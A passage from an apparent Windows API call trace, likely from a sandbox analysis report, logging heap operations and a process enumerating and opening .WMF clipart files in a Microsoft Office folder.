RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.505] AreFileApisANSI () returned 1 [0102.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 69 [0102.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a0)) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.505] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ec, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00152_.WMF", cAlternateFileName="")) returned 1 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.506] AreFileApisANSI () returned 1 [0102.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.506] AreFileApisANSI () returned 1 [0102.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0102.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 69 [0102.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.507] GetFileType (hFile=0x27c) returned 0x1 [0102.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.507] CloseHandle (hObject=0x27c) returned 1 [0102.508] AreFileApisANSI () returned 1 [0102.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0102.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 69 [0102.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.508] GetFileType (hFile=0x27c) returned 0x1 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.508] CloseHandle (hObject=0x27c) returned 1 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.509] AreFileApisANSI () returned 1 [0102.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0102.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 69 [0102.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ec)) returned 1 [0102.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0102.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.510] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00194_.WMF", cAlternateFileName="")) returned 1 [0102.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.511] AreFileApisANSI () returned 1 [0102.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.512] AreFileApisANSI () returned 1 [0102.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 69 [0102.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.512] GetFileType (hFile=0x27c) returned 0x1 [0102.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.512] SetFilePointerEx (in: 